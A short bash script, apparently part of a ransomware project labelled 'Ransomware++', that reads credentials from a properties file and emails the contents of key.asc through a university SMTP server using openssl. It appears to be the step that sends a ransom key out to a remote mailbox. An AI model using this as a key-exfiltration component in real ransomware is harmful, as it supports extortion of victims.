#!/bin/bash

if [ ! -e auth.prop ]; then
    echo "$0: No prop file found, stoping."
    exit 1
fi

function select-value () {
    value="$(grep $1 auth.prop | cut -d '=' -f 2-)"
    echo -n $value
}

username="$(select-value login | base64)"
password="$(select-value password | base64)"
from_email="$(select-value from)"
rcpt_email="$(select-value rcpt)"

key="$(cat key.asc)"

openssl s_client -starttls smtp -connect smtps.univ-lille1.fr:587 -crlf <<EOF 1>/home/dusartc/mail.log
helo univ-lille1.fr
auth login
`echo $username`
`echo $password`
mail from: $from_email
rcpt to: $rcpt_email
data
From: $from_email
To: $rcpt_email
Subject: Ransomware++

$key

.
EOF
